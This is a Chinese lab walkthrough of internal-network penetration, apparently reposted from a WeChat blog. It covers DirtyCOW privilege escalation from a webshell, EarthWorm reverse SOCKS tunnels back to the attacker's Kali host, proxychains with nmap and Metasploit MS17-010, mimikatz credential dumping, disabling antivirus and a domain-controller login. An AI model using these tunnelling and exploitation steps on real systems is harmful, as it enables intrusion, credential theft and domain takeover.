【Web渗透】SOCKS代理渗透内网

admin 2024年1月19日11:34:44评论24 views字数 3400阅读11分20秒阅读模式

1.背景

经过前期的渗透工作,我们现在已经成功找到了web站点的漏洞,并且获得了一个普通的webshell,现在准备用菜刀去连接它。

注意:本次环境在本地搭建,假设现在一无所知,这样更加真实。

2.对web服务器提权

2.1获取漏洞信息

获取到webshell后使用菜刀连接,查看权限是apache,系统是redhat6.5。

【Web渗透】SOCKS代理渗透内网

上传linux.sh到/tmp目录下,获取漏洞信息。

【Web渗透】SOCKS代理渗透内网

【Web渗透】SOCKS代理渗透内网

2.2使用脏牛提权

1)漏洞基本信息

选择CVE-2016-5195进行提权,该漏洞被称为“脏牛漏洞(DirtyCOW)”,危害是通过远程入侵获取低权限用户后,利用该漏洞在全版本Linux系统服务器上实现本地提权,从而获取到服务器root权限。

漏洞是由于Linux 内核的内存子系统在处理 Copy-on-Write 时出现竞争条件(漏洞),导致私有的只读内存映射被破坏、获取读写权限后进一步提权。

【Web渗透】SOCKS代理渗透内网

2)漏洞利用

在同版本的redhat系统上使用gcc编译此poc。

【Web渗透】SOCKS代理渗透内网

使用菜刀上传编译后的文件dirty到此web服务器上,给予可执行权限,password为密码,可以随意设置,我们将使用它来登录。

【Web渗透】SOCKS代理渗透内网【Web渗透】SOCKS代理渗透内网

现在查看/etc/passwd文件,发现第一行文件已经必修改,root用户必修改成了firefart,它现在拥有最高权限,而密码我们已经知晓,就是刚才设置的password。从很低的apache权限到root权限,提权结束。

【Web渗透】SOCKS代理渗透内网

3)使用xshell远程连接

因为菜刀上不太方便, 现在使用xshell远程连接,成功连接。(账号:firefart,密码:password)

【Web渗透】SOCKS代理渗透内网

可以看到有两个IP,我们猜测拓扑图应该是如下,win10和kali受我们控制,它们处于外网。我们可以访问web服务器的外网接口192.168.1.120,另外一个IP是192.168.223.166,它应该是连接内网,但是我们无法访问。

【Web渗透】SOCKS代理渗透内网

3.第一次使用SOCKS代理渗透内网

3.1SOCKS代理

1)SOCKS

Socks是一种代理服务,可以简单地将一端的系统连接到另外一端,支持多种协议,包括http、ftp请求及其它类型的请求。它分socks 4 和socks 5两种类型,socks 4只支持TCP协议而socks 5支持TCP/UDP协议,还支持各种身份验证机制等协议,其标准端口为1080。

2)Earthworm

EW是一套便携式的网络穿透工具,具有SOCKS5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,而且适用于不同的操作系统。

3)ProxyChains

ProxyChains是Linux下的代理工具,kali已经安装,它可以使任何程序通过代理上网,允许TCP和DNS通过代理隧道,支持HTTP、SOCKS4和SOCKS5类型的代理服务器,并且可配置多个代理。

3.2反弹socks5服务器

1)在kali上

在kali上运行:

./ew_linux_x64 -s rcsocks -l 1080 -e 1234

该命令的意思是在kali上添加一个转接隧道,把本地1080端口收到的代理请求转交给1234端口。

【Web渗透】SOCKS代理渗透内网

2)在web服务器上

我们刚才在win10已经使用xshell远程连接web服务器,运行:

./ew_linux_x64 -s rssocks -d 192.168.1.109 -e 1234

该命令的意思是在web服务器上启动SOCKS5服务,并反弹到IP地址为192.168.1.109(kali)的1234端口上。

【Web渗透】SOCKS代理渗透内网

3)配置proxychains.conf

现在就可以通过访问127.0.0.1:1080端口使用在右侧web服务器上架设的SOCKS5代理服务了。

【Web渗透】SOCKS代理渗透内网

/etc/proxychains.conf修改内容如下,去掉dynamic_chain的注释,并且在最后的位置添加代理。

【Web渗透】SOCKS代理渗透内网【Web渗透】SOCKS代理渗透内网

4)测试代理服务器是否正常

cp /usr/lib/proxychains3/proxyresolv /usr/bin/

proxyresolv 192.168.223.166

发现代理正常,现在我们已经可以访问192.168.223.166了。

【Web渗透】SOCKS代理渗透内网

4.渗透主机A

4.1proxychains启动nmap

用proxychains可以启动任何程序,proxychains配合nmap和msf是内网渗透的大杀器,需要注意的是proxychains不支持udp和icmp协议。现在启动nmap,使用TCP扫描,不使用ping扫描,扫描整个内网,我们发现只能访问下面这台机器,对它进行扫描:

【Web渗透】SOCKS代理渗透内网【Web渗透】SOCKS代理渗透内网

现在我们猜测拓扑图应该是如下,win10和kali受我们控制,它们处于外网,我们可以访问web服务器的外网接口192.168.1.120,另外一个内网IP是192.168.223.166,它只能访问内网的主机A 192.168.223.174。

【Web渗透】SOCKS代理渗透内网

4.2proxychains启动msf

1)启动msfconsole

【Web渗透】SOCKS代理渗透内网

2)攻击

选择漏洞利用模块ms17-010,MS17-010漏洞利用模块就是利用windows系统的windows smb远程执行代码漏洞,向Microsoft服务消息块服务器发送经特殊设计的消息后,允许远程代码执行。选择好漏洞利用模块和攻击载荷模块后,配置好参数,开始攻击。

【Web渗透】SOCKS代理渗透内网【Web渗透】SOCKS代理渗透内网

3)获取密码信息

使用mimikatz抓取密码,命令如下:

load mimikatz

kerberos

【Web渗透】SOCKS代理渗透内网

可以看到域是lingwen,有两个域用户lingwen0001和admin的密码已经破解出来了,都是“lingwen1.”。

4)信息收集

(1)查看系统信息

【Web渗透】SOCKS代理渗透内网

(2)查看进程

【Web渗透】SOCKS代理渗透内网

(3)查看系统用户

【Web渗透】SOCKS代理渗透内网【Web渗透】SOCKS代理渗透内网

(4)查看应用软件

【Web渗透】SOCKS代理渗透内网

(5)查看路由信息和最后登录时间

【Web渗透】SOCKS代理渗透内网

5)上传ew工具

查看进程号和权限,直接是system,关闭杀毒软件,开启远程桌面协议。

【Web渗透】SOCKS代理渗透内网

上传ew工具到主机A,为了后面使用这台机器A作为跳板访问其他内网主机。

【Web渗透】SOCKS代理渗透内网

一般情况下我们输入shell就可以进入目标机的shell下,可是这里不行,之前获得了2个域用户密码,我们尝试远程连接主机A。

4.3远程登录主机A

1)远程登录主机A

使用代理启动rdesktop在kali上远程连接主机A,即192.168.223.174,使用之前获得的admin域账号登录。

【Web渗透】SOCKS代理渗透内网

【Web渗透】SOCKS代理渗透内网

2)收集域信息

(1)查看域用户和域的数量

【Web渗透】SOCKS代理渗透内网

(2)查看域里面的组

【Web渗透】SOCKS代理渗透内网

(3)查看域内所有主机名

【Web渗透】SOCKS代理渗透内网

(4)查看域管理员

【Web渗透】SOCKS代理渗透内网

(5)查看域控制器

【Web渗透】SOCKS代理渗透内网

(6)查看企业管理组

【Web渗透】SOCKS代理渗透内网

我们发现之前在主机A获得的域用户admin竟然是域管理员账号。

3)查看dns信息

我们终于发现域控的IP是192.168.223.134。

【Web渗透】SOCKS代理渗透内网

5. 第二次使用SOCKS代理渗透内网

5.1内网拓扑图

【Web渗透】SOCKS代理渗透内网

5.2再次代理

1)分析

(1)第一次socks代理

通过第一次socks代理:在kali上添加一个转接隧道,把1080端口收到的代理请求转交给1234端口;在web服务器上启动SOCKS5服务,并反弹到IP地址为192.168.1.109(kali)的1234端口上。

之后我们在kali通过web服务器做跳板来访问主机A。

(2)现在的问题

虽然我们知道了域控的IP,域管理员的账号和密码,但是现在我们在kali上连接不到域控。如下所示,远程登录失败。

【Web渗透】SOCKS代理渗透内网

我们可不可以再次代理,使用主机A做跳板,把经过它的流量反弹到web服务器上,用kali连接web服务器。

2)在web服务器上

使用xshell建立新的会话连接web服务器192.168.1.120,在web服务器上运行:

./ew_linux_x64 -s rcsocks -l 6666 -e 5678

该命令的意思是在web服务器上添加一个转接隧道,把本地6666端口收到的代理请求转交给5678端口。

【Web渗透】SOCKS代理渗透内网

3)在主机A

在kali远程连接主机A,在主机A上运行:

ew_win32.exe -s rssocks -d 192.168.223.166 -e 5678

该命令的意思是在主机A上启动SOCKS5服务,并反弹到IP地址为192.168.223.166(web服务器)的5678端口上。

【Web渗透】SOCKS代理渗透内网

4)配置proxychains.conf

现在就可以通过访问192.168.1.120:6666端口使用在主机A上架设的SOCKS5代理服务了。

【Web渗透】SOCKS代理渗透内网

5)远程连接域控

发现现在已经可以访问域控了,使用域管理员账号成功登录。

【Web渗透】SOCKS代理渗透内网

【Web渗透】SOCKS代理渗透内网

原文始发于微信公众号(信安学习笔记):【Web渗透】SOCKS代理渗透内网

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月19日11:34:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【Web渗透】SOCKS代理渗透内网https://cn-sec.com/archives/2408787.html

发表评论

匿名网友 填写信息